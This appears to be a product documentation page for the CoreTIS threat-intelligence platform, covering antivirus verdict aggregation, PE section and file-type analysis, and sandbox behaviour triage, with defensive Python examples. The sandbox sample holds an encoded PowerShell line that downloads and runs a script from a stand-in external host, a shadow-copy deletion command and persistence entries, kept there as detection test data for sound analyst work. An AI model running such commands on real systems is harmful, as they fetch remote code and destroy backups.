Overview

The CoreTIS platform groups its analysis of file hash indicators under three tabs: "Detection," "Details," and "Behaviour." Each tab presents the data points an analyst needs to assess whether a file is malicious and what it does.

Detection Tab for File Hash Indicators

Antivirus Engine Analysis

This module looks up the file hash against the verdicts of multiple antivirus engines to surface known threats.

  • Data Provided:
    • Scan results indicating whether the file is deemed malicious, suspicious, or harmless by each engine.
  • Utility:
    • Provides an aggregated view of how different security platforms perceive the threat level of the file.
    • Helps to quickly identify files recognized as threats by multiple antivirus vendors.
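As an added example, not CoreTIS code, the Python below shows how an analyst can turn a per-engine verdict table into something actionable: verdict counts, a detection ratio, a consensus family name pulled from the detection labels, and a triage tier. The engine names, verdict labels, the generic-token list, the tier thresholds and the sample results are all constructed assumptions; the point is the aggregation logic, including the caveat that a hash seen by too few engines cannot be called clean.

```python
"""Aggregate per-engine antivirus verdicts for one file hash into a triage tier.

Added example, not CoreTIS code. The verdict labels, thresholds and the
per-engine results below are constructed for illustration.
"""
import re
from collections import Counter

# Constructed sample shaped like a per-engine verdict table (not real scan data).
SAMPLE_RESULTS = {
    "EngineA": {"verdict": "malicious", "name": "Trojan.Win32.Emotet.gen"},
    "EngineB": {"verdict": "malicious", "name": "W32/Emotet.A!tr"},
    "EngineC": {"verdict": "malicious", "name": "Trojan:Win32/Emotet.PA!MTB"},
    "EngineD": {"verdict": "suspicious", "name": "Heur.Generic.Malware"},
    "EngineE": {"verdict": "harmless", "name": None},
    "EngineF": {"verdict": "undetected", "name": None},
    "EngineG": {"verdict": "harmless", "name": None},
    "EngineH": {"verdict": "undetected", "name": None},
}

# Tokens that appear in almost every detection name and carry no family information.
GENERIC_TOKENS = {"trojan", "generic", "malware", "win32", "w32", "gen", "heur",
                  "variant", "agent", "tr", "mtb", "pa", "a", "b", "c"}


def summarize(results):
    """Count verdicts; 'undetected' is treated like 'harmless' (no signal either way)."""
    counts = Counter(r["verdict"] for r in results.values())
    total = len(results)
    return {
        "total": total,
        "malicious": counts["malicious"],
        "suspicious": counts["suspicious"],
        "clean": counts["harmless"] + counts["undetected"],
        "detection_ratio": counts["malicious"] / total if total else 0.0,
    }


def consensus_family(results):
    """Most common non-generic token across detection names, or None if there is none."""
    tokens = Counter()
    for r in results.values():
        if not r["name"]:
            continue
        for tok in re.split(r"[^a-z0-9]+", r["name"].lower()):
            if tok and not tok.isdigit() and tok not in GENERIC_TOKENS:
                tokens[tok] += 1
    return tokens.most_common(1)[0][0] if tokens else None


def triage_tier(summary, min_engines=5):
    """Map the aggregate to a priority; too few engines means no conclusion either way."""
    if summary["total"] < min_engines:
        return "insufficient-coverage"
    if summary["malicious"] >= 3 or summary["detection_ratio"] >= 0.25:
        return "high"
    if summary["malicious"] >= 1 or summary["suspicious"] >= 2:
        return "medium"
    return "low"


if __name__ == "__main__":
    s = summarize(SAMPLE_RESULTS)
    print(s, consensus_family(SAMPLE_RESULTS), triage_tier(s))
```

The family token is only a hint: vendors name the same sample differently, so treat a consensus that rests on one or two engines with caution, and never let a "low" tier stand in for a clean verdict when the hash is new to most engines.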

Details Tab for File Hash Indicators

File Names

Lists every filename under which this hash has been observed.

  • Utility:
    • Assists in identifying the file across different systems or networks.
    • Helps link different incidents involving the same file.

File Sections

Describes the structural layout of the file: its headers and the sections it maps into memory.

  • Utility:
    • Offers insight into the file's composition, which can indicate its purpose or nature.
    • Helps identify packed or obfuscated files: non-standard section names, high-entropy sections, and sections with no raw data but a large virtual size are common packing indicators.

Import Table

Lists the external libraries (DLLs) and the functions the file imports from them.

  • Utility:
    • Imports hint at capability; a combination of networking, process-manipulation and cryptographic APIs is more telling than any single import.
    • Supplies material for detection signatures, such as import-based YARA rules.

File Type Identification

Provides information on the file type, based on both the file extension and header analysis.

  • Utility:
    • Ensures the file is classified correctly so it is routed to the appropriate handling and analysis.
    • A mismatch between the extension and the header (an executable named with a .pdf extension, for instance) indicates file masquerading.
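As an added example that serves both the File Sections and the File Type Identification passages, and which is not CoreTIS code, the Python below does two things a static pass typically does: it types a file from its leading bytes and compares that with what the extension claims, and for PE files it parses the section table directly (no third-party library) to compute per-section entropy and apply the packing heuristics described above. The magic table, extension map, packer section-name list, entropy threshold and the minimal PE image are all constructed for illustration; the image is not a real binary.

```python
"""Header-based file typing plus PE section analysis for packing indicators.

Added example, not CoreTIS code. The magic table, extension map, thresholds and
the sample PE image are constructed for illustration.
"""
import hashlib
import math
import struct
from collections import Counter

MAGIC = [  # (leading bytes, type)
    (b"MZ", "pe"), (b"\x7fELF", "elf"), (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"), (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),
]
EXT_TYPES = {"exe": "pe", "dll": "pe", "scr": "pe", "so": "elf", "pdf": "pdf", "zip": "zip",
             "docx": "zip", "jar": "zip", "png": "png", "doc": "ole2", "xls": "ole2"}
# A few well-known packer section names; extend from your own corpus.
PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".vmp0", ".vmp1",
                   ".petite", "MPRESS1", "MPRESS2"}
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def identify(data):
    """Type from leading bytes only; the extension is never consulted here."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def check_masquerade(filename, data):
    """Return (detected, claimed, mismatch) comparing header type with the extension."""
    detected = identify(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXT_TYPES.get(ext)
    mismatch = claimed is not None and claimed != detected
    if detected in ("pe", "elf") and claimed != detected:  # executable behind any other extension
        mismatch = True
    return detected, claimed, mismatch


def shannon_entropy(buf):
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def pe_sections(data):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    if table + n_sections * 40 > len(data):
        raise ValueError("section table truncated")
    sections = []
    for i in range(n_sections):
        name, vsize, _va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(SECTION_FMT, data, table + i * 40)
        raw = data[rptr:rptr + rsize] if rsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize, "raw_size": rsize, "truncated": len(raw) < rsize,
            "entropy": round(shannon_entropy(raw), 2),
            # IMAGE_SCN_MEM_WRITE (0x80000000) together with IMAGE_SCN_MEM_EXECUTE (0x20000000)
            "write_exec": bool(chars & 0x80000000) and bool(chars & 0x20000000),
        })
    return sections


def packing_indicators(sections, entropy_threshold=7.0):
    hits = []
    for s in sections:
        n = s["name"]
        if n in PACKER_SECTIONS:
            hits.append(f"{n}: known packer section name")
        if s["raw_size"] and s["entropy"] > entropy_threshold:
            hits.append(f"{n}: entropy {s['entropy']} (compressed or encrypted data)")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            hits.append(f"{n}: no raw data but {s['virtual_size']} bytes virtual (unpack target)")
        if s["write_exec"]:
            hits.append(f"{n}: writable and executable")
    return hits


def build_sample_pe():
    """Constructed minimal PE image with UPX-style sections; not a real or runnable binary."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = b"\x0b\x01" + b"\x00" * 222  # PE32 magic, remaining optional header zeroed
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x0102)
    hdr_end = e_lfanew + 4 + len(coff) + len(opt) + 2 * 40
    payload = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))
    sec0 = struct.pack(SECTION_FMT, b"UPX0", 0x10000, 0x1000, 0, 0, 0, 0, 0, 0, 0xE0000080)
    sec1 = struct.pack(SECTION_FMT, b"UPX1", 0x2000, 0x11000, len(payload), hdr_end, 0, 0, 0, 0, 0xE0000040)
    return dos + b"PE\0\0" + coff + opt + sec0 + sec1 + payload


if __name__ == "__main__":
    pe = build_sample_pe()
    print(check_masquerade("invoice.pdf", pe))
    for hit in packing_indicators(pe_sections(pe)):
        print(hit)
```

Entropy above roughly 7 bits per byte is consistent with compressed or encrypted content, but it is not proof of packing on its own: resource sections holding images or embedded archives legitimately score that high, which is why the example reports several independent indicators rather than a single verdict.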

Sandbox Analysis

Results from executing the file in a controlled environment to observe its behavior.

  • Utility:
    • Reveals the file’s actions when executed, such as network communication, file modifications, or persistence mechanisms.
    • Aids in assessing the risk without exposing production environments.

Detection Scenarios

Outlines conditions or environments where the file has been detected or flagged.

  • Utility:
    • Provides context for the file’s discovery, helping to understand potential attack vectors.
    • Assists in situational awareness for security teams.

Behaviour Tab for File Hash Indicators

Dynamic Analysis

Offers a dynamic analysis of the file’s behavior, including network, registry, and process activities.

  • Data Provided:
    • Network connections initiated by the file.
    • File system activity (files created, modified, or deleted).
    • Mutex activity.
    • Service activity.
    • Registry keys created or modified.
    • Commands executed and processes started.
  • Utility:
    • Crucial for understanding the full scope of the file’s impact on a system.
    • Enables analysts to trace the file’s actions to identify malicious intent or side effects.
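As an added example covering both the Sandbox Analysis and Dynamic Analysis passages, and not CoreTIS code, the Python below triages a behaviour report of the shape described above: it labels outbound connections to non-internal addresses, executables dropped into writable user directories, Run-key and service persistence, encoded PowerShell (decoding the UTF-16LE base64 that -EncodedCommand expects) and shadow-copy deletion, and collects the mutex, path, URL and IP pivots an analyst would carry into other investigations. The report layout, field names and every value in the sample are constructed; 203.0.113.10 is a documentation address standing in for an external host.

```python
"""Triage a sandbox behaviour report: flag persistence, evasion and C2, extract pivots.

Added example, not CoreTIS code. The report layout, the field names and every
value in SAMPLE_REPORT are constructed; 203.0.113.10 is a documentation address.
"""
import base64
import ipaddress
import re

INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunServices)\b", re.I)
DROP_DIR_RE = re.compile(r"\\(Users\\Public|Temp|AppData\\(Local|Roaming))\\", re.I)
EXEC_EXTS = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".js")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def encode_powershell(script):
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE encoded script."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLE_REPORT = {  # constructed; not the output of any real sandbox run
    "network": [{"proto": "tcp", "dst": "203.0.113.10", "port": 443},
                {"proto": "udp", "dst": "10.0.0.53", "port": 53}],
    "files": [{"op": "write", "path": "C:\\Users\\Public\\svchost.exe"},
              {"op": "write", "path": "C:\\Users\\victim\\Documents\\report.docx"}],
    "mutexes": ["Global\\ExampleLoaderMutex"],
    "services": [{"op": "create", "name": "WinUpdSvc", "image": "C:\\Users\\Public\\svchost.exe"}],
    "registry": [{"op": "set", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
                  "value": "C:\\Users\\Public\\svchost.exe"}],
    "processes": [{"cmd": "powershell.exe -nop -w hidden -enc " + encode_powershell(
                       "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')")},
                  {"cmd": "vssadmin.exe delete shadows /all /quiet"}],
}


def decode_encoded_powershell(cmd):
    """Return the script behind -enc/-EncodedCommand, or None if there is none or it is malformed."""
    m = re.search(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_external(dst):
    """True for addresses outside the internal ranges; hostnames are treated as external pivots."""
    try:
        ip = ipaddress.ip_address(dst)
    except ValueError:
        return True
    return not any(ip in net for net in INTERNAL_NETS)


def triage(report):
    """Return (findings, iocs): tactic-labelled findings and the pivots worth correlating on."""
    findings = []
    iocs = {"ips": set(), "urls": set(), "paths": set(), "mutexes": set(report.get("mutexes", []))}
    for c in report.get("network", []):
        if is_external(c["dst"]):
            iocs["ips"].add(c["dst"])
            findings.append(f"command_and_control: outbound {c['proto']} to {c['dst']}:{c['port']}")
    for f in report.get("files", []):
        if f["op"] == "write" and DROP_DIR_RE.search(f["path"]) and f["path"].lower().endswith(EXEC_EXTS):
            iocs["paths"].add(f["path"])
            findings.append(f"execution: executable dropped at {f['path']}")
    for r in report.get("registry", []):
        if r["op"] == "set" and RUN_KEY_RE.search(r["key"]):
            findings.append(f"persistence: Run key {r['key']} -> {r['value']}")
    for s in report.get("services", []):
        if s["op"] == "create":
            findings.append(f"persistence: service {s['name']} installed from {s['image']}")
    for p in report.get("processes", []):
        decoded = decode_encoded_powershell(p["cmd"])
        if decoded:
            iocs["urls"].update(URL_RE.findall(decoded))
            findings.append(f"defense_evasion: encoded PowerShell decodes to: {decoded}")
        if re.search(r"vssadmin(\.exe)?\s+delete\s+shadows", p["cmd"], re.I):
            findings.append("impact: volume shadow copies deleted")
    return findings, iocs


if __name__ == "__main__":
    for line in triage(SAMPLE_REPORT)[0]:
        print(line)
```

The mutex is kept as a pivot rather than a finding: a mutex name proves nothing by itself, but the same name showing up in another sandbox run or on another host is exactly the kind of link between incidents the File Names section above is also meant to provide.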

Best Practices for Analysts

  • Use the Antivirus Engine Analysis as a first filter to prioritize investigation effort, bearing in mind that a hash unknown to most engines is not thereby clean.
  • Work through the Details tab for static analysis: file names, sections, imports and file type reveal the file's construction before it is ever run.
  • Use the Behaviour tab for dynamic analysis to see what the file actually does once executed: network, file system, registry, service and process activity.

Request a free consultation

The sales team and technical experts of Behin Rahkar will contact you as soon as possible.

On the path to security, we are with you every step of the way.

Request a demo

The sales team and technical experts of Behin Rahkar will contact you as soon as possible to provide a personalized demo tailored to your organization's needs.